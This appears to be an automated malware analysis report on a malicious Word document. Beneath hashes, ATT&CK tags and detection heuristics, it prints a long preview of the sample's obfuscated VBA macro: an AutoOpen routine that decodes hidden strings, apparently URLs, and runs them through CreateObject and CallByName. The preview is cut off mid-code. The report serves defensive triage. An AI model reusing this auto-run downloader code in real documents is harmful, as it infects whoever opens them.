Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 e2ea5af25c4e1942…

MALICIOUS

Office (OLE) / .DOC

274.0 KB Created: 2023-03-21 21:39:00 Authoring application: Microsoft Office Word First seen: 2023-03-22
MD5: 113a55bb02adefcc77f9d5569dacf6dc SHA-1: 60d9d3c06a0dbaf92dcf535556dd0a8fd5ab49d4 SHA-256: e2ea5af25c4e1942320c3893fadfd80955d059cd9fa0e9e8bb4e5b78f2c2576b
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a function that uses CallByName to invoke methods on an object, indicating an attempt to run arbitrary code. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firing, which signals auto-execution with code execution tokens. The primary IOC is the extracted VBA macro file itself, which is responsible for the malicious behavior.

Heuristics 8

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Ui = CreateObject(dTtDg)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName Zutu, KnXiJTz, 1, EFPHMX
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36357 bytes
SHA-256: 416898f790132d385aec1bfc2de25e220cf648e59c82806465e9a52087af1684
Detection
ClamAV: No threats found
Obfuscation or payload: likely
183 of 246 identifiers look randomly generated (e.g. 'tIipnTFvxINQBnyfaDGzmWycbSnqWfEXnvkLtMFn') — consistent with name-mangling obfuscation. Carved artifact contains 9 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub JjDss(Zutu As Object, EFPHMX As String)
Dim KnXiJTz As String
Dim XHBdxfPM As String
Dim fq(15) As Long
Dim UvU As Long
UvU = 12
XHBdxfPM = "XMtELeFfAPNCJYbFroleFUdleGllYRMIDvSeXaXCrECZ"
fq(0) = 12
fq(1) = 17
fq(2) = 6
fq(3) = 38
fq(4) = 3
fq(5) = 6
fq(6) = 7
fq(7) = 18
fq(8) = 19
fq(9) = 23
fq(10) = 6
fq(11) = 17
fq(12) = 16
fq(13) = 19
fq(14) = 3
KnXiJTz = zjU(XHBdxfPM, fq, UvU)
CallByName Zutu, KnXiJTz, 1, EFPHMX
End Sub
Sub zVo(JH As Object)
Dim VKDSSllC As String
Dim WZOYo As String
Dim KwXFhOGC(4) As Long
Dim jBqsDkwp As Long
jBqsDkwp = 4
WZOYo = "LeMYKZThODjZjdsPpnQ"
KwXFhOGC(0) = 9
KwXFhOGC(1) = 17
KwXFhOGC(2) = 2
KwXFhOGC(3) = 18
VKDSSllC = zjU(WZOYo, KwXFhOGC, jBqsDkwp)
CallByName JH, VKDSSllC, 1
End Sub
Sub AutoOpen()
Dim MIdtfjH As String
Dim Wt As String
Dim zKDHnE As String
Dim iOaIHKgD(57) As Long
Dim MGDPRTic As Long
MGDPRTic = 39
zKDHnE = "hpdeKqARjdvZqBRMpgaiYjojeAImtvit/wNn/VaapKoZJrEWVkLChAvFXlmVhgSJXHxdrWGnhEkgOqamBucOBXBgALfMzcKWiuMaSrI/XlyhbSjzCIuhoWvDEkCSApzEeojfOgbVy.iAjoBNQMchUrE1VBBVzm/GmEhmNWkfO:XKamUtyiMcrzQvp/jwtoysvcVBqvtnzNYwMc"
iOaIHKgD(0) = 1
iOaIHKgD(1) = 29
iOaIHKgD(2) = 29
iOaIHKgD(3) = 2
iOaIHKgD(4) = 170
iOaIHKgD(5) = 33
iOaIHKgD(6) = 33
iOaIHKgD(7) = 29
iOaIHKgD(8) = 4
iOaIHKgD(9) = 83
iOaIHKgD(10) = 1
iOaIHKgD(11) = 36
iOaIHKgD(12) = 20
iOaIHKgD(13) = 18
iOaIHKgD(14) = 82
iOaIHKgD(15) = 20
iOaIHKgD(16) = 29
iOaIHKgD(17) = 19
iOaIHKgD(18) = 46
iOaIHKgD(19) = 4
iOaIHKgD(20) = 138
iOaIHKgD(21) = 83
iOaIHKgD(22) = 23
iOaIHKgD(23) = 28
iOaIHKgD(24) = 33
iOaIHKgD(25) = 91
iOaIHKgD(26) = 23
iOaIHKgD(27) = 46
iOaIHKgD(28) = 82
iOaIHKgD(29) = 28
iOaIHKgD(30) = 33
iOaIHKgD(31) = 11
iOaIHKgD(32) = 9
iOaIHKgD(33) = 7
iOaIHKgD(34) = 50
iOaIHKgD(35) = 152
iOaIHKgD(36) = 52
iOaIHKgD(37) = 57
iOaIHKgD(38) = 33
iOaIHKgD(39) = 150
iOaIHKgD(40) = 203
iOaIHKgD(41) = 11
iOaIHKgD(42) = 70
iOaIHKgD(43) = 170
iOaIHKgD(44) = 156
iOaIHKgD(45) = 160
iOaIHKgD(46) = 4
iOaIHKgD(47) = 91
iOaIHKgD(48) = 30
iOaIHKgD(49) = 23
iOaIHKgD(50) = 85
iOaIHKgD(51) = 206
iOaIHKgD(52) = 101
iOaIHKgD(53) = 136
iOaIHKgD(54) = 72
iOaIHKgD(55) = 68
iOaIHKgD(56) = 93
Wt = zjU(zKDHnE, iOaIHKgD, MGDPRTic)
Dim BfCMB As String
Dim hPd As String
Dim nJIbINV(58) As Long
Dim eJcWDl As Long
eJcWDl = 54
hPd = "efpnpjFxTJMNiTs/tIipnTFvxINQBnyfaDGzmWycbSnqWfEXnvkLtMFnLqIWjYvbVscxRRobnXsyNRFEZcPbSeaDXnmhPojPWLYf8tciDcQDokinuOEhoUmrebeWUbcPRusKLGtMJLOCmogpWBlagMECoBS/amidIKVdshYDioBrjLALUUcFRD-lyUWaamtIXXUgUrvPVainWcQCBIqXJHxbXIkteMwdRkvNmoKyezuxtyysdJjhzaUJsEAzwvsSMsktrVhxTtL/DnIvYHyreFPXWhAR:mnAnAeXzpPaplQChIyqCqnawpcznRSlEcsxrYOEV.GWf/XIlUtluBltJm/BGLiaaDIWYJOMuzFisXPgnweUsxCRlvv"
nJIbINV(0) = 92
nJIbINV(1) = 17
nJIbINV(2) = 17
nJIbINV(3) = 3
nJIbINV(4) = 15
nJIbINV(5) = 285
nJIbINV(6) = 16
nJIbINV(7) = 16
nJIbINV(8) = 15
nJIbINV(9) = 33
nJIbINV(10) = 40
nJIbINV(11) = 92
nJIbINV(12) = 13
nJIbINV(13) = 4
nJIbINV(14) = 13
nJIbINV(15) = 4
nJIbINV(16) = 17
nJIbINV(17) = 1
nJIbINV(18) = 120
nJIbINV(19) = 4
nJIbINV(20) = 33
nJIbINV(21) = 17
nJIbINV(22) = 13
nJIbINV(23) = 71
nJIbINV(24) = 4
nJIbINV(25) = 33
nJIbINV(26) = 147
nJIbINV(27) = 326
nJIbINV(28) = 40
nJIbINV(29) = 71
nJIbINV(30) = 37
nJIbINV(31) = 16
nJIbINV(32) = 223
nJIbINV(33) = 3
nJIbINV(34) = 183
nJIbINV(35) = 33
nJIbINV(36) = 160
nJIbINV(37) = 37
nJIbINV(38) = 13
nJIbINV(39) = 4
nJIbINV(40) = 16
nJIbINV(41) = 18
nJIbINV(42) = 52
nJIbINV(43) = 65
nJIbINV(44) = 34
nJIbINV(45) = 4
nJIbINV(46) = 147
nJIbINV(47) = 37
nJIbINV(48) = 18
nJIbINV(49) = 175
nJIbINV(50) = 9
nJIbINV(51) = 41
nJIbINV(52) = 101
nJIbINV(53) = 16
nJIbINV(54) = 296
nJIbINV(55) = 356
nJIbINV(56) = 202
nJIbINV(57) = 176
BfCMB = zjU(hPd, nJIbINV, eJcWDl)
Dim scG As String
Dim No As String
Dim ZrBBnK(71) As Long
Dim TxQK As Long
TxQK = 37
No = "bXHmUHt7:OKndnuYK.LEP/lHsfqGmTpoHtaVgHMqASESAgEIQaBovpStLXowtOactvHXwPyYyuEtpvAxspLQFfO/sOmSsaRcZIFnjdoFKl/RdCAcLygskYdpleR/VdgeClWehYp/zYuLWOs.xRKAPpj"
ZrBBnK(0) = 133
ZrBBnK(1) = 7
ZrBBnK(2) = 7
ZrBBnK(3) = 31
ZrBBnK(4) = 9
ZrBBnK(5) = 22
ZrBBnK(6) = 22
ZrBBnK(7) = 25
ZrBBnK(8) = 32
ZrBBnK(9) = 4
ZrBBnK(10) = 122
ZrBBnK(11) = 37
ZrBBnK(12) = 13
ZrBBnK(13) = 31
ZrBBnK(14) = 25
ZrBBnK(15) = 23
ZrBBnK(16) = 32
ZrBBnK(17) = 23
ZrBBnK(18) = 18
ZrBBnK(19) = 8
ZrBBnK(20) = 4
ZrBBnK(21) = 18
ZrBBnK(22) = 31
ZrBBnK(23) = 23
ZrBBnK(24) = 22
ZrBBnK(25) = 13
ZrBBnK(26) = 35
ZrBBnK(27) = 7
ZrBBnK(28) = 35
ZrBBnK(29) = 1
ZrBBnK(30) = 35
ZrBBnK(31) = 25
ZrBBnK(32) = 122
ZrBBnK(33) = 22
ZrBBnK(34) = 23
ZrBBnK(35) = 15
ZrBBnK(36) = 22
ZrBBnK(37) = 69
ZrBBnK(38) = 51
ZrBBnK(39) = 38
ZrBBnK(40) = 35
ZrBBnK(41) = 25
ZrBBnK(42) = 120
ZrBBnK(43) = 67
ZrBBnK(44) = 73
ZrBBnK(45) = 52
ZrBBnK(46) = 145
ZrBBnK(47) = 120
ZrBBnK(48) = 59
ZrBBnK(49) = 95
ZrBBnK(50) = 147
ZrBBnK(51) = 0
ZrBBnK(52) = 23
ZrBBnK(53) = 19
ZrBBnK(54) = 76
ZrBBnK(55) = 107
ZrBBnK(56) = 150
ZrBBnK(57) = 36
ZrBBnK(58) = 51
ZrBBnK(59) = 53
ZrBBnK(60) = 110
ZrBBnK(61) = 95
ZrBBnK(62) = 125
ZrBBnK(63) = 145
ZrBBnK(64) = 57
ZrBBnK(65) = 131
ZrBBnK(66) = 106
ZrBBnK(67) = 46
ZrBBnK(68) = 92
ZrBBnK(69) = 26
ZrBBnK(70) = 117
scG = zjU(No, ZrBBnK, TxQK)
Dim jlscQ As String
Dim tn As String
Dim eVCFTs(124) As Long
Dim gXIp As Long
gXIp = 45
tn = "FxzRqlVZjpFDCqatcZFmNrhdyjcQfuLuBRDv/wrdpmpNJ/uSuaFpvPUuH/CKRacpVptPYsJnOPAGelN/vWiLbIzLruVJPqNFlgnCLRDoPypjLChLtwVLLiWekrwbdYQVpqZSbUYsiOPIMZ/VOWSd0uLOymwBVw.gmBWgUrfOUoaXKZYwlaQFUVFddLyYfzUloEmmQzhKIDrjWSJerE-XNFpBwUlcmGyKHncMqadYJWUtYrjDWYFFKLdTDgnKhqxMOyiDcYMITzgLxgjaszuZHOUZARbhEUkiXzLTVcAIgDeeg:fDPlgNOvwiAWbeLXQfJKknzwOWxKyYUJIFeROJrbLfWaFftghQHlkMNT8iupVgGjQTPNqnRFd"
eVCFTs(0) = 23
eVCFTs(1) = 16
eVCFTs(2) = 16
eVCFTs(3) = 10
eVCFTs(4) = 302
eVCFTs(5) = 37
eVCFTs(6) = 37
eVCFTs(7) = 98
eVCFTs(8) = 24
eVCFTs(9) = 17
eVCFTs(10) = 98
eVCFTs(11) = 22
eVCFTs(12) = 104
eVCFTs(13) = 30
eVCFTs(14) = 10
eVCFTs(15) = 159
eVCFTs(16) = 36
eVCFTs(17) = 72
eVCFTs(18) = 37
eVCFTs(19) = 38
eVCFTs(20) = 10
eVCFTs(21) = 211
eVCFTs(22) = 15
eVCFTs(23) = 24
eVCFTs(24) = 20
eVCFTs(25) = 83
eVCFTs(26) = 72
eVCFTs(27) = 37
eVCFTs(28) = 149
eVCFTs(29) = 83
eVCFTs(30) = 10
eVCFTs(31) = 82
eVCFTs(32) = 141
eVCFTs(33) = 28
eVCFTs(34) = 69
eVCFTs(35) = 98
eVCFTs(36) = 98
eVCFTs(37) = 31
eVCFTs(38) = 73
eVCFTs(39) = 12
eVCFTs(40) = 359
eVCFTs(41) = 82
eVCFTs(42) = 15
eVCFTs(43) = 29
eVCFTs(44) = 37
eVCFTs(45) = 20
eVCFTs(46) = 65
eVCFTs(47) = 256
eVCFTs(48) = 77
eVCFTs(49) = 287
eVCFTs(50) = 142
eVCFTs(51) = 159
eVCFTs(52) = 29
eVCFTs(53) = 181
eVCFTs(54) = 171
eVCFTs(55) = 15
eVCFTs(56) = 79
eVCFTs(57) = 299
eVCFTs(58) = 250
eVCFTs(59) = 82
eVCFTs(60) = 151
eVCFTs(61) = 277
eVCFTs(62) = 194
eVCFTs(63) = 270
eVCFTs(64) = 309
eVCFTs(65) = 195
eVCFTs(66) = 239
eVCFTs(67) = 86
eVCFTs(68) = 329
eVCFTs(69) = 49
eVCFTs(70) = 193
eVCFTs(71) = 234
eVCFTs(72) = 337
eVCFTs(73) = 122
eVCFTs(74) = 306
eVCFTs(75) = 230
eVCFTs(76) = 251
eVCFTs(77) = 332
eVCFTs(78) = 3
eVCFTs(79) = 291
eVCFTs(80) = 293
eVCFTs(81) = 317
eVCFTs(82) = 110
eVCFTs(83) = 39
eVCFTs(84) = 74
eVCFTs(85) = 233
eVCFTs(86) = 337
eVCFTs(87) = 37
eVCFTs(88) = 91
eVCFTs(89) = 245
eVCFTs(90) = 205
eVCFTs(91) = 102
eVCFTs(92) = 114
eVCFTs(93) = 195
eVCFTs(94) = 70
eVCFTs(95) = 13
eVCFTs(96) = 310
eVCFTs(97) = 307
eVCFTs(98) = 247
eVCFTs(99) = 185
eVCFTs(100) = 76
eVCFTs(101) = 244
eVCFTs(102) = 229
eVCFTs(103) = 4
eVCFTs(104) = 289
eVCFTs(105) = 270
eVCFTs(106) = 211
eVCFTs(107) = 270
eVCFTs(108) = 181
eVCFTs(109) = 242
eVCFTs(110) = 167
eVCFTs(111) = 206
eVCFTs(112) = 367
eVCFTs(113) = 106
eVCFTs(114) = 96
eVCFTs(115) = 124
eVCFTs(116) = 224
eVCFTs(117) = 56
eVCFTs(118) = 248
eVCFTs(119) = 14
eVCFTs(120) = 16
eVCFTs(121) = 0
eVCFTs(122) = 359
eVCFTs(123) = 144
jlscQ = zjU(tn, eVCFTs, gXIp)
Dim TFMz As String
Dim HMQYOby As String
Dim JrZ(170) As Long
Dim iZiHtoD As Long
iZiHtoD = 57
HMQYOby = "lVuodDGuRTPKFxKHerZgYRrZRY/CS:.aJvkcBEFBkVWPjwGHhayjuPpXuozDtVwtNuy3gtoeVUtbKSPAgbHidTQbVoMpFKxdrQhdNMiDOOqer/jKJQNrp9AdxloHbLXLLfYcXMbBszboWTjslJepIG0AsmutvgetVitnWr-BA6otHwEW/A0LVcLvFq4UBqsgk6mwEynRojeyaYDHlX/WaULMtwhGnpoEjGaNxICxtwwwskXtyygRPOrMtpmn/oryxOplFpLWnlfoGmy.niFevcgxrRzRzvVxAhuZQNaaaiQVlfM"
JrZ(0) = 49
JrZ(1) = 61
JrZ(2) = 61
JrZ(3) = 55
JrZ(4) = 137
JrZ(5) = 30
JrZ(6) = 27
JrZ(7) = 27
JrZ(8) = 137
JrZ(9) = 3
JrZ(10) = 55
JrZ(11) = 55
JrZ(12) = 1
JrZ(13) = 84
JrZ(14) = 17
JrZ(15) = 18
JrZ(16) = 36
JrZ(17) = 84
JrZ(18) = 61
JrZ(19) = 51
JrZ(20) = 31
JrZ(21) = 36
JrZ(22) = 4
JrZ(23) = 154
JrZ(24) = 31
JrZ(25) = 154
JrZ(26) = 14
JrZ(27) = 27
JrZ(28) = 46
JrZ(29) = 55
JrZ(30) = 167
JrZ(31) = 36
JrZ(32) = 4
JrZ(33) = 164
JrZ(34) = 61
JrZ(35) = 17
JrZ(36) = 164
JrZ(37) = 61
JrZ(38) = 27
JrZ(39) = 14
JrZ(40) = 151
JrZ(41) = 3
JrZ(42) = 170
JrZ(43) = 46
JrZ(44) = 29
JrZ(45) = 10
JrZ(46) = 151
JrZ(47) = 68
JrZ(48) = 51
JrZ(49) = 170
JrZ(50) = 56
JrZ(51) = 187
JrZ(52) = 118
JrZ(53) = 91
JrZ(54) = 105
JrZ(55) = 107
JrZ(56) = 27
JrZ(57) = 260
JrZ(58) = 208
JrZ(59) = 144
JrZ(60) = 285
JrZ(61) = 264
JrZ(62) = 300
JrZ(63) = 52
JrZ(64) = 176
JrZ(65) = 101
JrZ(66) = 202
JrZ(67) = 268
JrZ(68) = 189
JrZ(69) = 39
JrZ(70) = 45
JrZ(71) = 208
JrZ(72) = 264
JrZ(73) = 181
JrZ(74) = 136
JrZ(75) = 200
JrZ(76) = 138
JrZ(77) = 117
JrZ(78) = 182
JrZ(79) = 261
JrZ(80) = 184
JrZ(81) = 66
JrZ(82) = 118
JrZ(83) = 138
JrZ(84) = 8
JrZ(85) = 154
JrZ(86) = 53
JrZ(87) = 278
JrZ(88) = 240
JrZ(89) = 292
JrZ(90) = 70
JrZ(91) = 109
JrZ(92) = 274
JrZ(93) = 296
JrZ(94) = 254
JrZ(95) = 296
JrZ(96) = 251
JrZ(97) = 41
JrZ(98) = 233
JrZ(99) = 79
JrZ(100) = 35
JrZ(101) = 178
JrZ(102) = 266
JrZ(103) = 95
JrZ(104) = 198
JrZ(105) = 285
JrZ(106) = 152
JrZ(107) = 56
JrZ(108) = 58
JrZ(109) = 21
JrZ(110) = 296
JrZ(111) = 107
JrZ(112) = 193
JrZ(113) = 259
JrZ(114) = 276
JrZ(115) = 300
JrZ(116) = 2
JrZ(117) = 94
JrZ(118) = 290
JrZ(119) = 103
JrZ(120) = 237
JrZ(121) = 11
JrZ(122) = 175
JrZ(123) = 219
JrZ(124) = 84
JrZ(125) = 273
JrZ(126) = 159
JrZ(127) = 209
JrZ(128) = 142
JrZ(129) = 186
JrZ(130) = 198
JrZ(131) = 257
JrZ(132) = 38
JrZ(133) = 121
JrZ(134) = 220
JrZ(135) = 235
JrZ(136) = 142
JrZ(137) = 84
JrZ(138) = 19
JrZ(139) = 54
JrZ(140) = 112
JrZ(141) = 71
JrZ(142) = 6
JrZ(143) = 266
JrZ(144) = 17
JrZ(145) = 146
JrZ(146) = 162
JrZ(147) = 129
JrZ(148) = 205
JrZ(149) = 186
JrZ(150) = 246
JrZ(151) = 82
JrZ(152) = 156
JrZ(153) = 212
JrZ(154) = 19
JrZ(155) = 299
JrZ(156) = 37
JrZ(157) = 39
JrZ(158) = 238
JrZ(159) = 302
JrZ(160) = 256
JrZ(161) = 16
JrZ(162) = 14
JrZ(163) = 116
JrZ(164) = 91
JrZ(165) = 144
JrZ(166) = 99
JrZ(167) = 90
JrZ(168) = 5
JrZ(169) = 175
TFMz = zjU(HMQYOby, JrZ, iZiHtoD)
Dim eQK As String
Dim LnDipyk As String
Dim Fvb(67) As Long
Dim QzrqJEy As Long
QzrqJEy = 37
LnDipyk = "fxFdLdZYzfwy/NVyce/KCAEAzeEIrzNghmKtoqWJPVaKOMNaoMHxfmST/lRngAzaQik/a.RQAATiidsgWIufKoHppFatPerqOgdOBcofqydyEgSIUR:QiEtBTKl.hplrbYCagDrVhhnAzBhaieavolWRXNzWzQkaqRnNSZzpjnQEadkEcGptqYNKppPCsZpLMZdAMFWEmArfEETzHYmYKyQjUIdVxdCwg/ExOBYhKTqZLhWLSzoptZSPLfxUbrMl"
Fvb(0) = 33
Fvb(1) = 36
Fvb(2) = 36
Fvb(3) = 88
Fvb(4) = 115
Fvb(5) = 13
Fvb(6) = 13
Fvb(7) = 4
Fvb(8) = 43
Fvb(9) = 29
Fvb(10) = 129
Fvb(11) = 43
Fvb(12) = 9
Fvb(13) = 66
Fvb(14) = 70
Fvb(15) = 37
Fvb(16) = 29
Fvb(17) = 32
Fvb(18) = 70
Fvb(19) = 32
Fvb(20) = 18
Fvb(21) = 13
Fvb(22) = 58
Fvb(23) = 43
Fvb(24) = 60
Fvb(25) = 32
Fvb(26) = 83
Fvb(27) = 43
Fvb(28) = 32
Fvb(29) = 18
Fvb(30) = 13
Fvb(31) = 66
Fvb(32) = 12
Fvb(33) = 65
Fvb(34) = 46
Fvb(35) = 33
Fvb(36) = 13
Fvb(37) = 60
Fvb(38) = 46
Fvb(39) = 66
Fvb(40) = 214
Fvb(41) = 10
Fvb(42) = 237
Fvb(43) = 207
Fvb(44) = 197
Fvb(45) = 227
Fvb(46) = 2
Fvb(47) = 103
Fvb(48) = 92
Fvb(49) = 176
Fvb(50) = 72
Fvb(51) = 207
Fvb(52) = 107
Fvb(53) = 64
Fvb(54) = 36
Fvb(55) = 91
Fvb(56) = 126
Fvb(57) = 56
Fvb(58) = 170
Fvb(59) = 149
Fvb(60) = 96
Fvb(61) = 256
Fvb(62) = 190
Fvb(63) = 42
Fvb(64) = 68
Fvb(65) = 103
Fvb(66) = 221
eQK = zjU(LnDipyk, Fvb, QzrqJEy)
Dim nnY As String
Dim Vybd As String
Dim BgWFqxn(48) As Long
Dim ylK As Long
ylK = 40
Vybd = "NtM/lRPQrAn:kRtI/e.ThTMLUwCgA//nNdeuOfXifOrdjliKgXKDKnoVqGFwrzPBmAhmRHkIEilxdOxqZsCDMiYobHmodtSYzZoWqKoesI8qrTIgSvvctrpjFNoaDoJvg/ikJvcfNjzafD"
BgWFqxn(0) = 21
BgWFqxn(1) = 2
BgWFqxn(2) = 2
BgWFqxn(3) = 119
BgWFqxn(4) = 12
BgWFqxn(5) = 4
BgWFqxn(6) = 4
BgWFqxn(7) = 116
BgWFqxn(8) = 55
BgWFqxn(9) = 11
BgWFqxn(10) = 38
BgWFqxn(11) = 18
BgWFqxn(12) = 34
BgWFqxn(13) = 18
BgWFqxn(14) = 9
BgWFqxn(15) = 124
BgWFqxn(16) = 2
BgWFqxn(17) = 40
BgWFqxn(18) = 55
BgWFqxn(19) = 11
BgWFqxn(20) = 116
BgWFqxn(21) = 40
BgWFqxn(22) = 57
BgWFqxn(23) = 19
BgWFqxn(24) = 38
BgWFqxn(25) = 9
BgWFqxn(26) = 4
BgWFqxn(27) = 40
BgWFqxn(28) = 65
BgWFqxn(29) = 124
BgWFqxn(30) = 28
BgWFqxn(31) = 18
BgWFqxn(32) = 82
BgWFqxn(33) = 4
BgWFqxn(34) = 107
BgWFqxn(35) = 6
BgWFqxn(36) = 16
BgWFqxn(37) = 59
BgWFqxn(38) = 9
BgWFqxn(39) = 4
BgWFqxn(40) = 108
BgWFqxn(41) = 83
BgWFqxn(42) = 85
BgWFqxn(43) = 131
BgWFqxn(44) = 43
BgWFqxn(45) = 116
BgWFqxn(46) = 5
BgWFqxn(47) = 76
nnY = zjU(Vybd, BgWFqxn, ylK)
Dim nN As String
Dim dP As String
Dim GlQ(70) As Long
Dim OQoC As Long
OQoC = 47
dP = "cn/eJuqqMwjWExkFuyvkbxFNIhKOFwtozWJkA5XqwKMKJJZRyqoLyqbeZZlop/ukmtbrnYpncnn.woLTGprHnQqmeYeaDipiFuhM/qliotSCDiANIvarqVmFNDecAGibfjAwxZrGoLvDhsGrBLBwCEcquMbWTVCLdHdgxiBQvWVCCzkyhmDlWHBbOZsonaJXnTIAmGdRGFRMxTaTomOodInPOhSslcB:xDoFiyqUGClaPJfcshhunJdzCX/FdvPIeL/nJhGzajpgEOYtepAbAArlYCIeVbWcMlmpqniTZaipjBRKubtdOjgPbsCaUdN-RKN5fCwhiInJybmqdLayd"
GlQ(0) = 26
GlQ(1) = 31
GlQ(2) = 31
GlQ(3) = 61
GlQ(4) = 224
GlQ(5) = 3
GlQ(6) = 3
GlQ(7) = 26
GlQ(8) = 32
GlQ(9) = 1
GlQ(10) = 19
GlQ(11) = 94
GlQ(12) = 4
GlQ(13) = 2
GlQ(14) = 1
GlQ(15) = 26
GlQ(16) = 6
GlQ(17) = 18
GlQ(18) = 4
GlQ(19) = 2
GlQ(20) = 164
GlQ(21) = 94
GlQ(22) = 92
GlQ(23) = 76
GlQ(24) = 19
GlQ(25) = 2
GlQ(26) = 3
GlQ(27) = 10
GlQ(28) = 61
GlQ(29) = 320
GlQ(30) = 92
GlQ(31) = 161
GlQ(32) = 65
GlQ(33) = 94
GlQ(34) = 2
GlQ(35) = 3
GlQ(36) = 38
GlQ(37) = 80
GlQ(38) = 38
GlQ(39) = 5
GlQ(40) = 21
GlQ(41) = 12
GlQ(42) = 92
GlQ(43) = 6
GlQ(44) = 59
GlQ(45) = 28
GlQ(46) = 3
GlQ(47) = 261
GlQ(48) = 121
GlQ(49) = 170
GlQ(50) = 47
GlQ(51) = 203
GlQ(52) = 253
GlQ(53) = 229
GlQ(54) = 288
GlQ(55) = 205
GlQ(56) = 20
GlQ(57) = 251
GlQ(58) = 49
GlQ(59) = 324
GlQ(60) = 304
GlQ(61) = 153
GlQ(62) = 115
GlQ(63) = 15
GlQ(64) = 40
GlQ(65) = 284
GlQ(66) = 239
GlQ(67) = 37
GlQ(68) = 289
GlQ(69) = 290
nN = zjU(dP, GlQ, OQoC)
Dim FTi As String
Dim tYmLHoM As String
Dim YgIqdtYK(80) As Long
Dim rt As Long
rt = 52
tYmLHoM = "zvHpessOeUqIcgvtMBspUNxGHdhhWbEFzbqOtiDbpBLVneSAkaxpJFcuJCuwMc/qagLxu/nnRiTbxoqTdtKpyheoEdMk-nCrecQVWALOvtyndrkulLVJDNYyhmPbbVVztDjxkCvXvhCJMkuBlvAZoiQDSRCfzvOW.hTwNKyTQaKsmEuyWpDTMPzKhDpPiSUsqyFozQTPvnhtnOWFrWaspiSjggaJGgoiDIOhbdvrWXXuMBIzhHDorUwwmBaLr/cxZIqvaGfTF/kttczLTYHOGcOFDdgyJCvzBzogRv/WZOtrtQsONWfEaxSi:oiDx"
YgIqdtYK(0) = 27
YgIqdtYK(1) = 16
YgIqdtYK(2) = 16
YgIqdtYK(3) = 4
YgIqdtYK(4) = 313
YgIqdtYK(5) = 63
YgIqdtYK(6) = 63
YgIqdtYK(7) = 6
YgIqdtYK(8) = 4
YgIqdtYK(9) = 38
YgIqdtYK(10) = 96
YgIqdtYK(11) = 38
YgIqdtYK(12) = 16
YgIqdtYK(13) = 56
YgIqdtYK(14) = 50
YgIqdtYK(15) = 113
YgIqdtYK(16) = 78
YgIqdtYK(17) = 56
YgIqdtYK(18) = 16
YgIqdtYK(19) = 26
YgIqdtYK(20) = 78
YgIqdtYK(21) = 78
YgIqdtYK(22) = 96
YgIqdtYK(23) = 50
YgIqdtYK(24) = 26
YgIqdtYK(25) = 2
YgIqdtYK(26) = 5
YgIqdtYK(27) = 45
YgIqdtYK(28) = 16
YgIqdtYK(29) = 56
YgIqdtYK(30) = 96
YgIqdtYK(31) = 5
YgIqdtYK(32) = 6
YgIqdtYK(33) = 161
YgIqdtYK(34) = 78
YgIqdtYK(35) = 96
YgIqdtYK(36) = 14
YgIqdtYK(37) = 63
YgIqdtYK(38) = 13
YgIqdtYK(39) = 14
YgIqdtYK(40) = 38
YgIqdtYK(41) = 93
YgIqdtYK(42) = 30
YgIqdtYK(43) = 38
YgIqdtYK(44) = 45
YgIqdtYK(45) = 63
YgIqdtYK(46) = 14
YgIqdtYK(47) = 156
YgIqdtYK(48) = 16
YgIqdtYK(49) = 53
YgIqdtYK(50) = 45
YgIqdtYK(51) = 63
YgIqdtYK(52) = 81
YgIqdtYK(53) = 176
YgIqdtYK(54) = 255
YgIqdtYK(55) = 221
YgIqdtYK(56) = 120
YgIqdtYK(57) = 208
YgIqdtYK(58) = 242
YgIqdtYK(59) = 242
YgIqdtYK(60) = 308
YgIqdtYK(61) = 116
YgIqdtYK(62) = 284
YgIqdtYK(63) = 259
YgIqdtYK(64) = 274
YgIqdtYK(65) = 9
YgIqdtYK(66) = 101
YgIqdtYK(67) = 208
YgIqdtYK(68) = 296
YgIqdtYK(69) = 284
YgIqdtYK(70) = 297
YgIqdtYK(71) = 53
YgIqdtYK(72) = 306
YgIqdtYK(73) = 64
YgIqdtYK(74) = 199
YgIqdtYK(75) = 171
YgIqdtYK(76) = 249
YgIqdtYK(77) = 111
YgIqdtYK(78) = 150
YgIqdtYK(79) = 38
FTi = zjU(tYmLHoM, YgIqdtYK, rt)
Dim zhPayWCq As String
Dim GFhhLzI As String
Dim LFtlv(78) As Long
